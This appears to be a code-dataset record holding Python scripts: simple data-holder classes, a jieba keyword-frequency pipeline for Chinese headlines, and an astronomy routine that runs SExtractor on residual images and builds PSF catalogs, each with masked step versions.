'accuracy_list':accuracy_list, 'list_of_predicted_list':list_of_predicted_list, 'costs':costs, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,\r\n 't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})\r\n \r\n \r\nclass MyModel:\r\n num_layers = 4\r\n k_fm = 24\r\n fs = 3\r\n fm1 = 32\r\n bottleneck = 4\r\n dropout_prob = 0.8\r\n batch_size = [16]\r\n learn_rate = 0.001\r\n num_of_test = 40\r\n\r\nmodel = MyModel()\r\n \r\n\r\ndensenet('1','org',1,model)\r\ndensenet('1','org',2,model)\r\ndensenet('1','org',3,model)\r\ndensenet('1','org',4,model)\r\ndensenet('1','org',5,model)\r\n\r\ndensenet('1','aug',1,model)\r\ndensenet('1','aug',2,model)\r\ndensenet('1','aug',3,model)\r\ndensenet('1','aug',4,model)\r\ndensenet('1','aug',5,model)\r\n\r\ndensenet('2','org',1,model)\r\ndensenet('2','org',2,model)\r\ndensenet('2','org',3,model)\r\ndensenet('2','org',4,model)\r\ndensenet('2','org',5,model)\r\n \r\ndensenet('2','aug',1,model)\r\ndensenet('2','aug',2,model)\r\ndensenet('2','aug',3,model)\r\ndensenet('2','aug',4,model)\r\ndensenet('2','aug',5,model)\r\n\r\ndensenet('3','org',1,model)\r\ndensenet('3','org',2,model)\r\ndensenet('3','org',3,model)\r\ndensenet('3','org',4,model)\r\ndensenet('3','org',5,model)\r\n\r\ndensenet('3','aug',1,model)\r\ndensenet('3','aug',2,model)\r\ndensenet('3','aug',3,model)\r\ndensenet('3','aug',4,model)\r\ndensenet('3','aug',5,model)\r\n",
"step-ids": [
1,
2,
3,
5,
6
]
}
|
[
1,
2,
3,
5,
6
] |
#!/usr/bin/env python
# encoding: utf8
#from __future__ import unicode_literals
class RefObject(object):
def __init__(self,):
self.pose = []
self.name = []
self.time = None
self.id = None
def set_data(self,pose, name, time, Id):
self.pose = pose
self.name = name
self.time = time
self.id = Id
class Datafunction(object):
def __init__(self,):
self.series = []
self.ref_point = RefObject()
self.clAss = None
self.first_time = None
self.last_time = None
self.id = None
def set_series(self,series):
self.series = series
def set_time(self, first, last):
self.first_time = first
self.last_time = last
def set_id(self,Id):
self.id = Id
def set_class(self, clAss):
self.clAss = clAss
def set_ref_object(self,pose, name, time, Id):
self.ref_point.set_data(pose, name, time, Id)
def get_series(self,):
return self.series
def get_class(self,):
return self.clAss
def get_id(self,):
return self.id
def get_ref_point(self,):
return self.ref_point
def get_first_time(self,):
return self.first_time
def get_last_time(self):
return self.last_time
if __name__ == '__main__':
print("Hello")
|
normal
|
{
"blob_id": "7611a57705939ce456e34d5ae379d6ca748b13c3",
"index": 1884,
"step-1": "<mask token>\n\n\nclass Datafunction(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def get_first_time(self):\n return self.first_time\n\n def get_last_time(self):\n return self.last_time\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Datafunction(object):\n\n def __init__(self):\n self.series = []\n self.ref_point = RefObject()\n self.clAss = None\n self.first_time = None\n self.last_time = None\n self.id = None\n\n def set_series(self, series):\n self.series = series\n\n def set_time(self, first, last):\n self.first_time = first\n self.last_time = last\n\n def set_id(self, Id):\n self.id = Id\n\n def set_class(self, clAss):\n self.clAss = clAss\n\n def set_ref_object(self, pose, name, time, Id):\n self.ref_point.set_data(pose, name, time, Id)\n\n def get_series(self):\n return self.series\n\n def get_class(self):\n return self.clAss\n <mask token>\n <mask token>\n\n def get_first_time(self):\n return self.first_time\n\n def get_last_time(self):\n return self.last_time\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Datafunction(object):\n\n def __init__(self):\n self.series = []\n self.ref_point = RefObject()\n self.clAss = None\n self.first_time = None\n self.last_time = None\n self.id = None\n\n def set_series(self, series):\n self.series = series\n\n def set_time(self, first, last):\n self.first_time = first\n self.last_time = last\n\n def set_id(self, Id):\n self.id = Id\n\n def set_class(self, clAss):\n self.clAss = clAss\n\n def set_ref_object(self, pose, name, time, Id):\n self.ref_point.set_data(pose, name, time, Id)\n\n def get_series(self):\n return self.series\n\n def get_class(self):\n return self.clAss\n\n def get_id(self):\n return self.id\n <mask token>\n\n def get_first_time(self):\n return self.first_time\n\n def get_last_time(self):\n return self.last_time\n\n\n<mask token>\n",
"step-4": "class RefObject(object):\n\n def __init__(self):\n self.pose = []\n self.name = []\n self.time = None\n self.id = None\n\n def set_data(self, pose, name, time, Id):\n self.pose = pose\n self.name = name\n self.time = time\n self.id = Id\n\n\nclass Datafunction(object):\n\n def __init__(self):\n self.series = []\n self.ref_point = RefObject()\n self.clAss = None\n self.first_time = None\n self.last_time = None\n self.id = None\n\n def set_series(self, series):\n self.series = series\n\n def set_time(self, first, last):\n self.first_time = first\n self.last_time = last\n\n def set_id(self, Id):\n self.id = Id\n\n def set_class(self, clAss):\n self.clAss = clAss\n\n def set_ref_object(self, pose, name, time, Id):\n self.ref_point.set_data(pose, name, time, Id)\n\n def get_series(self):\n return self.series\n\n def get_class(self):\n return self.clAss\n\n def get_id(self):\n return self.id\n\n def get_ref_point(self):\n return self.ref_point\n\n def get_first_time(self):\n return self.first_time\n\n def get_last_time(self):\n return self.last_time\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python\r\n# encoding: utf8\r\n#from __future__ import unicode_literals\r\n\r\nclass RefObject(object):\r\n def __init__(self,):\r\n self.pose = []\r\n self.name = []\r\n self.time = None\r\n self.id = None\r\n def set_data(self,pose, name, time, Id):\r\n self.pose = pose\r\n self.name = name\r\n self.time = time \r\n self.id = Id\r\n \r\nclass Datafunction(object):\r\n def __init__(self,):\r\n self.series = []\r\n self.ref_point = RefObject()\r\n self.clAss = None\r\n self.first_time = None\r\n self.last_time = None\r\n self.id = None\r\n \r\n def set_series(self,series):\r\n self.series = series\r\n \r\n def set_time(self, first, last):\r\n self.first_time = first\r\n self.last_time = last\r\n \r\n def set_id(self,Id):\r\n self.id = Id\r\n \r\n def set_class(self, clAss):\r\n self.clAss = clAss\r\n \r\n def set_ref_object(self,pose, name, time, Id):\r\n self.ref_point.set_data(pose, name, time, Id)\r\n \r\n def get_series(self,):\r\n return self.series\r\n \r\n def get_class(self,):\r\n return self.clAss\r\n \r\n def get_id(self,):\r\n return self.id\r\n \r\n def get_ref_point(self,):\r\n return self.ref_point\r\n\r\n def get_first_time(self,):\r\n return self.first_time\r\n\r\n def get_last_time(self):\r\n return self.last_time\r\n \r\nif __name__ == '__main__':\r\n print(\"Hello\")\r\n",
"step-ids": [
3,
11,
12,
16,
18
]
}
|
[
3,
11,
12,
16,
18
] |
#!/usr/bin/env python
#coding:utf-8
import jieba.analyse as analyse
from collections import Counter
import time
from os import path
import jieba
import importlib, sys
importlib.reload(sys)
import csv
import pandas as pd
from pandas import DataFrame
jieba.load_userdict("newdict.txt")
d = path.dirname(__file__)
filepath = r'C:\Users\Lenovo\zqrbtest\redup.csv'
def removdup():
train = pd.read_csv(r'C:\Users\Lenovo\zqrbtest\data.csv')
train = train['titlec']
train = set(train)
data = pd.DataFrame(list(train), columns=['titlec'])
data.to_csv('redup.csv', index=False, encoding='utf_8_sig')
if __name__ == "__main__":
def stopwordslist(filepath):
stopwords = [line.strip() for line in open(filepath, 'r', encoding='utf-8').read().split('\n')]
rs2 = []
return stopwords
def seg_sentence (sentence):
sentence_seged = jieba.cut(sentence.strip())
stopwords = stopwordslist('stop.txt')
outstr = ''
for word in sentence_seged:
if word not in stopwords:
if word != '\t':
outstr += word
outstr += " "
return outstr
inputs = open('redup.csv', 'r', encoding='utf-8')
outputs = open('hel.csv', 'w', encoding='utf-8')
for line in inputs:
line_seg = seg_sentence(line)
outputs.write(line_seg + '\n')
outputs.close()
inputs.close()
if __name__ == "__main__":
aResult = removdup()
csvfile = open('wordCount.csv', 'w', newline='', encoding='utf_8_sig')
spamwriter = csv.writer(csvfile)
word_list = []
key_list = []
for line in open('hel.csv', 'r', encoding='UTF-8'):
item = line.strip('\n\r').split('\t')
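# extract_tags ranks the words of the (already segmented) line by TF-IDF and returns the top keywords (20 by default)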
tags = jieba.analyse.extract_tags(item[0])
for t in tags:
word_list.append(t)
word_dict = {}
with open("result3.txt", 'w') as wf2:
for item in word_list:
if item not in word_dict:
word_dict[item] = 1
else:
word_dict[item] += 1
orderList = list(word_dict.values())
orderList.sort(reverse=True)
for i in range(len(orderList)):
for key in word_dict:
if word_dict[key] == orderList[i]:
wf2.write(key + ' ' + str(word_dict[key]) + '\n')
key_list.append(key)
word_dict[key] = 0
for i in range(len(key_list)):
spamwriter.writerow((key_list[i], orderList[i]))
csvfile.close()
rf_path = 'wordCount.csv'  # match the case of the file written above
title = ['keyut', 'fre']
r2g = pd.read_csv(rf_path, header=None)
insertRow = pd.DataFrame([title])
r2g = insertRow.append(r2g, ignore_index=True)
df = r2g.to_csv('wordcount-1.csv', header=None, index=None, encoding='utf_8_sig')
a = pd.read_csv('wordcount-1.csv')
a.set_index('keyut')
b = pd.read_csv('total.csv', encoding='utf_8_sig', engine='python')
b.set_index('keyut')
c = pd.merge(b, a, on='keyut', how='left')
c.to_csv('collection.csv', encoding='utf_8_sig')
|
normal
|
{
"blob_id": "6f3aa4e1309745265bb9d79df5f5a352e54493f9",
"index": 6313,
"step-1": "<mask token>\n\n\ndef removdup():\n train = pd.read_csv('C:\\\\Users\\\\Lenovo\\\\zqrbtest\\\\data.csv')\n train = train['titlec']\n train = set(train)\n data = pd.DataFrame(list(train), columns=['titlec'])\n data.to_csv('redup.csv', index=False, encoding='utf_8_sig')\n\n\n<mask token>\n",
"step-2": "<mask token>\nimportlib.reload(sys)\n<mask token>\njieba.load_userdict('newdict.txt')\n<mask token>\n\n\ndef removdup():\n train = pd.read_csv('C:\\\\Users\\\\Lenovo\\\\zqrbtest\\\\data.csv')\n train = train['titlec']\n train = set(train)\n data = pd.DataFrame(list(train), columns=['titlec'])\n data.to_csv('redup.csv', index=False, encoding='utf_8_sig')\n\n\nif __name__ == '__main__':\n\n def stopwordslist(filepath):\n stopwords = [line.strip() for line in open(filepath, 'r', encoding=\n 'utf-8').read().split('\\n')]\n rs2 = []\n return stopwords\n\n def seg_sentence(sentence):\n sentence_seged = jieba.cut(sentence.strip())\n stopwords = stopwordslist('stop.txt')\n outstr = ''\n for word in sentence_seged:\n if word not in stopwords:\n if word != '\\t':\n outstr += word\n outstr += ' '\n return outstr\n inputs = open('redup.csv', 'r', encoding='utf-8')\n outputs = open('hel.csv', 'w', encoding='utf-8')\n for line in inputs:\n line_seg = seg_sentence(line)\n outputs.write(line_seg + '\\n')\n outputs.close()\n inputs.close()\nif __name__ == '__main__':\n aResult = removdup()\n csvfile = open('wordCount.csv', 'w', newline='', encoding='utf_8_sig')\n spamwriter = csv.writer(csvfile)\n word_list = []\n key_list = []\n for line in open('hel.csv', 'r', encoding='UTF-8'):\n item = line.strip('\\n\\r').split('\\t')\n tags = jieba.analyse.extract_tags(item[0])\n for t in tags:\n word_list.append(t)\n word_dict = {}\n with open('result3.txt', 'w') as wf2:\n for item in word_list:\n if item not in word_dict:\n word_dict[item] = 1\n else:\n word_dict[item] += 1\n orderList = list(word_dict.values())\n orderList.sort(reverse=True)\n for i in range(len(orderList)):\n for key in word_dict:\n if word_dict[key] == orderList[i]:\n wf2.write(key + ' ' + str(word_dict[key]) + '\\n')\n key_list.append(key)\n word_dict[key] = 0\n for i in range(len(key_list)):\n spamwriter.writerow((key_list[i], orderList[i]))\n csvfile.close()\n rf_path = 'wordcount.csv'\n title = ['keyut', 'fre']\n r2g = pd.read_csv(rf_path, header=None)\n insertRow = pd.DataFrame([title])\n r2g = insertRow.append(r2g, ignore_index=True)\n df = r2g.to_csv('wordcount-1.csv', header=None, index=None, encoding=\n 'utf_8_sig')\n a = pd.read_csv('wordcount-1.csv')\n a.set_index('keyut')\n b = pd.read_csv('total.csv', encoding='utf_8_sig', engine='python')\n b.set_index('keyut')\n c = pd.merge(b, a, on='keyut', how='left')\n c.to_csv('collection.csv', encoding='utf_8_sig')\n",
"step-3": "<mask token>\nimportlib.reload(sys)\n<mask token>\njieba.load_userdict('newdict.txt')\nd = path.dirname(__file__)\nfilepath = 'C:\\\\Users\\\\Lenovo\\\\zqrbtest\\\\redup.csv'\n\n\ndef removdup():\n train = pd.read_csv('C:\\\\Users\\\\Lenovo\\\\zqrbtest\\\\data.csv')\n train = train['titlec']\n train = set(train)\n data = pd.DataFrame(list(train), columns=['titlec'])\n data.to_csv('redup.csv', index=False, encoding='utf_8_sig')\n\n\nif __name__ == '__main__':\n\n def stopwordslist(filepath):\n stopwords = [line.strip() for line in open(filepath, 'r', encoding=\n 'utf-8').read().split('\\n')]\n rs2 = []\n return stopwords\n\n def seg_sentence(sentence):\n sentence_seged = jieba.cut(sentence.strip())\n stopwords = stopwordslist('stop.txt')\n outstr = ''\n for word in sentence_seged:\n if word not in stopwords:\n if word != '\\t':\n outstr += word\n outstr += ' '\n return outstr\n inputs = open('redup.csv', 'r', encoding='utf-8')\n outputs = open('hel.csv', 'w', encoding='utf-8')\n for line in inputs:\n line_seg = seg_sentence(line)\n outputs.write(line_seg + '\\n')\n outputs.close()\n inputs.close()\nif __name__ == '__main__':\n aResult = removdup()\n csvfile = open('wordCount.csv', 'w', newline='', encoding='utf_8_sig')\n spamwriter = csv.writer(csvfile)\n word_list = []\n key_list = []\n for line in open('hel.csv', 'r', encoding='UTF-8'):\n item = line.strip('\\n\\r').split('\\t')\n tags = jieba.analyse.extract_tags(item[0])\n for t in tags:\n word_list.append(t)\n word_dict = {}\n with open('result3.txt', 'w') as wf2:\n for item in word_list:\n if item not in word_dict:\n word_dict[item] = 1\n else:\n word_dict[item] += 1\n orderList = list(word_dict.values())\n orderList.sort(reverse=True)\n for i in range(len(orderList)):\n for key in word_dict:\n if word_dict[key] == orderList[i]:\n wf2.write(key + ' ' + str(word_dict[key]) + '\\n')\n key_list.append(key)\n word_dict[key] = 0\n for i in range(len(key_list)):\n spamwriter.writerow((key_list[i], orderList[i]))\n csvfile.close()\n rf_path = 'wordcount.csv'\n title = ['keyut', 'fre']\n r2g = pd.read_csv(rf_path, header=None)\n insertRow = pd.DataFrame([title])\n r2g = insertRow.append(r2g, ignore_index=True)\n df = r2g.to_csv('wordcount-1.csv', header=None, index=None, encoding=\n 'utf_8_sig')\n a = pd.read_csv('wordcount-1.csv')\n a.set_index('keyut')\n b = pd.read_csv('total.csv', encoding='utf_8_sig', engine='python')\n b.set_index('keyut')\n c = pd.merge(b, a, on='keyut', how='left')\n c.to_csv('collection.csv', encoding='utf_8_sig')\n",
"step-4": "import jieba.analyse as analyse\nfrom collections import Counter\nimport time\nfrom os import path\nimport jieba\nimport importlib, sys\nimportlib.reload(sys)\nimport csv\nimport pandas as pd\nfrom pandas import DataFrame\njieba.load_userdict('newdict.txt')\nd = path.dirname(__file__)\nfilepath = 'C:\\\\Users\\\\Lenovo\\\\zqrbtest\\\\redup.csv'\n\n\ndef removdup():\n train = pd.read_csv('C:\\\\Users\\\\Lenovo\\\\zqrbtest\\\\data.csv')\n train = train['titlec']\n train = set(train)\n data = pd.DataFrame(list(train), columns=['titlec'])\n data.to_csv('redup.csv', index=False, encoding='utf_8_sig')\n\n\nif __name__ == '__main__':\n\n def stopwordslist(filepath):\n stopwords = [line.strip() for line in open(filepath, 'r', encoding=\n 'utf-8').read().split('\\n')]\n rs2 = []\n return stopwords\n\n def seg_sentence(sentence):\n sentence_seged = jieba.cut(sentence.strip())\n stopwords = stopwordslist('stop.txt')\n outstr = ''\n for word in sentence_seged:\n if word not in stopwords:\n if word != '\\t':\n outstr += word\n outstr += ' '\n return outstr\n inputs = open('redup.csv', 'r', encoding='utf-8')\n outputs = open('hel.csv', 'w', encoding='utf-8')\n for line in inputs:\n line_seg = seg_sentence(line)\n outputs.write(line_seg + '\\n')\n outputs.close()\n inputs.close()\nif __name__ == '__main__':\n aResult = removdup()\n csvfile = open('wordCount.csv', 'w', newline='', encoding='utf_8_sig')\n spamwriter = csv.writer(csvfile)\n word_list = []\n key_list = []\n for line in open('hel.csv', 'r', encoding='UTF-8'):\n item = line.strip('\\n\\r').split('\\t')\n tags = jieba.analyse.extract_tags(item[0])\n for t in tags:\n word_list.append(t)\n word_dict = {}\n with open('result3.txt', 'w') as wf2:\n for item in word_list:\n if item not in word_dict:\n word_dict[item] = 1\n else:\n word_dict[item] += 1\n orderList = list(word_dict.values())\n orderList.sort(reverse=True)\n for i in range(len(orderList)):\n for key in word_dict:\n if word_dict[key] == orderList[i]:\n wf2.write(key + ' ' + str(word_dict[key]) + '\\n')\n key_list.append(key)\n word_dict[key] = 0\n for i in range(len(key_list)):\n spamwriter.writerow((key_list[i], orderList[i]))\n csvfile.close()\n rf_path = 'wordcount.csv'\n title = ['keyut', 'fre']\n r2g = pd.read_csv(rf_path, header=None)\n insertRow = pd.DataFrame([title])\n r2g = insertRow.append(r2g, ignore_index=True)\n df = r2g.to_csv('wordcount-1.csv', header=None, index=None, encoding=\n 'utf_8_sig')\n a = pd.read_csv('wordcount-1.csv')\n a.set_index('keyut')\n b = pd.read_csv('total.csv', encoding='utf_8_sig', engine='python')\n b.set_index('keyut')\n c = pd.merge(b, a, on='keyut', how='left')\n c.to_csv('collection.csv', encoding='utf_8_sig')\n",
"step-5": "#!/usr/bin/env python\r\n#coding:utf-8\r\nimport jieba.analyse as analyse\r\nfrom collections import Counter\r\nimport time\r\nfrom os import path\r\nimport jieba\r\nimport importlib, sys\r\nimportlib.reload(sys)\r\nimport csv\r\nimport pandas as pd\r\nfrom pandas import DataFrame\r\n\r\njieba.load_userdict(\"newdict.txt\")\r\nd = path.dirname(__file__)\r\nfilepath = r'C:\\Users\\Lenovo\\zqrbtest\\redup.csv'\r\n\r\ndef removdup():\r\n train = pd.read_csv(r'C:\\Users\\Lenovo\\zqrbtest\\data.csv')\r\n train = train['titlec']\r\n train = set(train)\r\n data = pd.DataFrame(list(train), columns=['titlec'])\r\n data.to_csv('redup.csv', index=False, encoding='utf_8_sig')\r\n \r\nif __name__ == \"__main__\":\r\n def stopwordslist(filepath):\r\n stopwords = [line.strip()for line in open(filepath, 'r', encoding='utf-8').read().split('\\n')]\r\n rs2 = []\r\n return stopwords\r\n def seg_sentence (sentence):\r\n sentence_seged = jieba.cut(sentence.strip())\r\n stopwords = stopwordslist('stop.txt')\r\n outstr = ''\r\n for word in sentence_seged:\r\n if word not in stopwords:\r\n if word != '\\t':\r\n outstr += word\r\n outstr += \" \"\r\n return outstr\r\n inputs = open('redup.csv', 'r', encoding='utf-8')\r\n outputs = open('hel.csv', 'w', encoding='utf-8')\r\n for line in inputs:\r\n line_seg = seg_sentence(line)\r\n outputs.write(line_seg + '\\n')\r\n outputs.close()\r\n inputs.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n aResult = removdup()\r\n csvfile = open('wordCount.csv', 'w', newline='', encoding='utf_8_sig')\r\n spamwriter = csv.writer(csvfile)\r\n word_list = []\r\n key_list = []\r\n for line in open('hel.csv', 'r', encoding='UTF-8'):\r\n item = line.strip('\\n\\r').split('\\t')\r\n tags = jieba.analyse.extract_tags(item[0])\r\n for t in tags:\r\n word_list.append(t)\r\n\r\n word_dict = {}\r\n with open(\"result3.txt\", 'w') as wf2:\r\n for item in word_list:\r\n if item not in word_dict:\r\n word_dict[item] = 1\r\n else:\r\n word_dict[item] += 1\r\n\r\n orderList = list(word_dict.values())\r\n orderList.sort(reverse=True)\r\n for i in range(len(orderList)):\r\n\r\n for key in word_dict:\r\n if word_dict[key] == orderList[i]:\r\n wf2.write(key + ' ' + str(word_dict[key]) + '\\n')\r\n key_list.append(key)\r\n word_dict[key] = 0\r\n\r\n for i in range(len(key_list)):\r\n spamwriter.writerow((key_list[i], orderList[i]))\r\n csvfile.close()\r\n \r\n rf_path = 'wordcount.csv'\r\n title = ['keyut', 'fre']\r\n\r\n r2g = pd.read_csv(rf_path, header=None)\r\n insertRow = pd.DataFrame([title])\r\n r2g = insertRow.append(r2g, ignore_index=True)\r\n df = r2g.to_csv('wordcount-1.csv', header=None, index=None, encoding='utf_8_sig')\r\n\r\n a = pd.read_csv('wordcount-1.csv')\r\n a.set_index('keyut')\r\n b = pd.read_csv('total.csv', encoding='utf_8_sig', engine='python')\r\n b.set_index('keyut')\r\n c = pd.merge(b, a, on='keyut', how='left')\r\n c.to_csv('collection.csv', encoding='utf_8_sig')\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 4 13:04:32 2018
@author: andrew
"""
import os
import glob
import initialize
import psf
from astropy.io import fits
import filters
import numpy as np
import sys
import MR
from tqdm import tqdm
def sextractor_MR(location, MR_method='swarp', use_config_file=True):
'''
runs SExtractor on master residual
'''
check_MR = glob.glob("%s/residuals/MR.fits" % (location))
if check_MR == []:
print("-> Master residual does not exist, creating it first...")
if use_config_file == True:
MR_method = initialize.get_config_value('MR_method')
MR.MR(location, MR_method)
master_res = glob.glob("%s/residuals/MR.fits" % (location))
temp = glob.glob("%s/templates/*.fits" % (location))
if len(master_res) == 1:
if len(temp) == 1:
MR_path = master_res[0]  # renamed: a local named MR would shadow the imported MR module and break MR.MR() above
template = temp[0]
temp_name = template.split('/')[-1]
temp_name = temp_name[:-5]
MR_hdu = fits.open(MR_path)
MR_header = MR_hdu[0].header
saturate = MR_header['SATURATE']
temp_hdr = fits.getheader(template)
pixscale = temp_hdr['PIXSCALE']
MR_hdu.close()
FWHM = psf.fwhm_template(template)
config_loc = location + '/configs/default.sex'
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[9] = "PARAMETERS_NAME" + " " + location + "/configs/default.param" + "\n"
data[20] = "FILTER_NAME" + " " + location + "/configs/default.conv" + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
print("\n-> SExtracting master residual...")
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
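# the numeric indices below target specific lines of the stock default.sex template (saturation level, seeing FWHM, PSF model, pixel scale, weight image); they will break if the config layout changes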
data[51] = "SATUR_LEVEL" + " " + str(saturate) + "\n"
data[62] = "SEEING_FWHM" + " " + str(FWHM) + "\n"
data[106] = "PSF_NAME" + " " + location + "/psf/" + temp_name + ".psf" + "\n"
data[58] = "PIXEL_SCALE" + " " + str(pixscale) + "\n"
data[32] = "WEIGHT_IMAGE" + " " + "%s[1]" % (MR) + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
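# SExtract the master residual, then repeat on an inverted copy (MR_neg.fits) so that negative-flux sources are catalogued as well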
os.system("sextractor %s[0]> %s/sources/MR_sources.txt -c %s" % (MR, location, config_loc))
temp_hdu_data = fits.PrimaryHDU((fits.getdata(MR))*-1, header=fits.getheader(MR))
temp_hdu_mask = fits.ImageHDU(fits.getdata(MR, 1))
temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])
temp_hdu_list.writeto("%s/residuals/MR_neg.fits" % (location))
os.system("sextractor %s/residuals/MR_neg.fits[0]> %s/sources/MR_sources_2.txt -c %s" % (location, location, config_loc))
append_negative_sources(MR_path, MR=True)
MR_filter_sources(location)
else:
print("-> Error: Problem with number of template images\n-> Could not finish SExtracting master residual")
else:
print("-> Error: Problem with number of master residuals\n-> Could not finish SExtracting master residual")
def sextractor(location):
'''
runs SExtractor on all residual images
'''
x = 0
sources = location + "/sources"
residuals = location + "/residuals"
check = os.path.exists(sources)
check_temp = os.path.exists(sources + '/temp')
length = len(residuals) + 1
if check == False:
os.system("mkdir %s" % (sources))
os.system("mkdir %s/temp" % (sources))
else:
if check_temp == False:
os.system("mkdir %s/temp" % (sources))
images = glob.glob(residuals + "/*_residual_.fits")
initialize.create_configs(location)
config_loc = location + '/configs/default.sex'
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[9] = "PARAMETERS_NAME" + " " + location + "/configs/default.param" + "\n"
data[20] = "FILTER_NAME" + " " + location + "/configs/default.conv" + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
print("-> Converting all residual masks into weight maps...\n")
for r in tqdm(images):
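# turn each residual's bad-pixel mask into a weight map (1 = usable pixel, 0 = masked), attach it as FITS extension 1, and normalize the residual once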
weight = weight_map(r)
hdu = fits.open(r, mode='update')
data = hdu[0].data
hdr = hdu[0].header
try:
if hdr['WEIGHT'] == 'N':
hdr.set('WEIGHT','Y')
hduData = fits.PrimaryHDU(data, header=hdr)
hduWeight = fits.ImageHDU(weight)
hduList = fits.HDUList([hduData, hduWeight])
hduList.writeto(r, overwrite=True)
except KeyError:
hdr.set('WEIGHT','Y')
hduData = fits.PrimaryHDU(data, header=hdr)
hduWeight = fits.ImageHDU(weight)
hduList = fits.HDUList([hduData, hduWeight])
hduList.writeto(r, overwrite=True)
hdu.close()
try:
if fits.getval(r, 'NORM') == 'N':
fits.setval(r, 'NORM', value='Y')
MR.normalize(r)
except KeyError:
fits.setval(r, 'NORM', value='Y')
MR.normalize(r)
print("\n-> SExtracting residual images...")
for i in images:
name = i[length:-5]
data_name = location + '/data/' + name.replace('residual_','') + '.fits'
FWHM = psf.fwhm(data_name)
im_hdu = fits.open(data_name)
im_header = im_hdu[0].header
saturate = im_header['SATURATE']
pixscale = im_header['PIXSCALE']
im_hdu.close()
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[51] = "SATUR_LEVEL" + " " + str(saturate) + "\n"
data[62] = "SEEING_FWHM" + " " + str(FWHM) + "\n"
data[106] = "PSF_NAME" + " " + location + "/psf/" + name[:-9] + ".psf" + "\n"
data[58] = "PIXEL_SCALE" + " " + str(pixscale) + "\n"
data[32] = "WEIGHT_IMAGE" + " " + "%s[1]" % (i) + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
os.system("sextractor %s[0]> %s/temp/%s.txt -c %s" % (i, sources, name, config_loc))
temp_hdu_data = fits.PrimaryHDU((fits.getdata(i))*-1, header=fits.getheader(i))
temp_hdu_mask = fits.ImageHDU(fits.getdata(i, 1))
temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])
temp_hdu_list.writeto("%s/residuals/temp.fits" % (location))
os.system("sextractor %s/residuals/temp.fits[0]> %s/temp/%s_2.txt -c %s" % (location, sources, name, config_loc))
append_negative_sources(i)
os.remove("%s/residuals/temp.fits" % (location))
x += 1
per = float(x)/float(len(images)) * 100
print("\t %.1f%% sextracted..." % (per))
print("-> SExtracted %d images, catalogues placed in 'sources' directory\n" % (len(images)))
print("-> Filtering source catalogs...\n")
src_join(location)
filter_sources(location)
def sextractor_sim(image):
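'''
runs SExtractor on a simulated (fake-source) image and on its inverted copy, then joins and filters the resulting catalogs
'''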
location = image.split('/')[:-2]
location = '/'.join(location)
sources = location + "/sources"
check = os.path.exists(sources)
check_temp = os.path.exists(sources + '/temp')
if check == False:
os.system("mkdir %s" % (sources))
os.system("mkdir %s/temp" % (sources))
else:
if check_temp == False:
os.system("mkdir %s/temp" % (sources))
initialize.create_configs(location)
config_loc = location + '/configs/default.sex'
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[9] = "PARAMETERS_NAME" + " " + location + "/configs/default.param" + "\n"
data[20] = "FILTER_NAME" + " " + location + "/configs/default.conv" + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
print("\n-> SExtracting fake image...")
name = image.split('/')[-1]
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[106] = "PSF_NAME" + " " + location + "/psf/" + name[:-5] + ".psf" + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
os.system("sextractor %s[0]> %s/temp/%s.txt -c %s" % (image, sources, name, config_loc))
temp_hdu_data = fits.PrimaryHDU((fits.getdata(image))*-1, header=fits.getheader(image))
temp_hdu_mask = fits.ImageHDU(fits.getdata(image, 1))
temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])
temp_hdu_list.writeto("%s/residuals/temp.fits")
os.system("sextractor %s/residuals/temp.fits[0]> %s/temp/%s.txt -c %s" % (location, sources, name, config_loc))
os.remove("%s/residuals/temp.fits" % (location))
src_join(location)
filter_sources(location)
def sextractor_psf(location):
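'''
builds SExtractor .cat catalogs of the science (_A_) and template images for the PSF-modelling step, skipping images that already have catalogs
'''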
x = 0
psf_loc = location + "/psf"
data = location + "/data"
templates = location + "/templates"
check = os.path.exists(psf_loc)
if check == False:
os.system("mkdir %s" % (psf_loc))
temps = glob.glob(templates + "/*.fits")
images = glob.glob(data + "/*_A_.fits")
for t in temps:
images.append(t)
cats = glob.glob(location + '/psf/*.cat')
images_names = [(i.split('/')[-1])[:-5] for i in images]
cats_names = [(c.split('/')[-1])[:-4] for c in cats]
imageCats = [im for im in images_names if im not in cats_names]
images = []
if temps == []:
temps.append('')
for imcats in imageCats:
if imcats == (temps[0].split('/')[-1])[:-5]:
images.append(temps[0])
else:
images.append(location+'/data/'+imcats+'.fits')
initialize.create_configs(location)
config_loc = location + '/configs/psf.sex'
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[9] = "PARAMETERS_NAME" + " " + location + "/configs/default.psfex" + "\n"
data[19] = "FILTER_NAME" + " " + location + "/configs/default.conv" + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
print("\n-> Creating PSF catalogs...")
if len(temps) == 1:
for i in images:
name = i.split('/')[-1][:-5]
hdu = fits.open(i)
hdr = hdu[0].header
pixscale = hdr['PIXSCALE']
hdu.close()
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
